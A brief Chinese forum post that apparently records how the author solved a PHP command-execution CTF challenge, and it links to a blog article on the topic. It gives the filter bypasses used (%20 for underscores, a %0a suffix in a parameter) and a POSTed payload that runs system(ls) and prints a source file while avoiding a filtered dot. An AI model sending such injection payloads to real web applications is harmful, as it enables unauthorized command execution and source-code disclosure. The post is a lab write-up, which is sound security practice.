太菜了,搞好久
使用HackBar载入地址
按提示加入
file.php?k%20e%20y=123%0a
%20绕过下划线
%0a将字符串扩充长度不影响数值比较
加入post值
command=system(ls);highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
为了绕过文件名的点直接背过气去,后面有个帖子帮了忙。
地址贴下面,有需要的收藏。
CTF之PHP命令执行 - hithub - 博客园 (cnblogs.com)
|
|
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜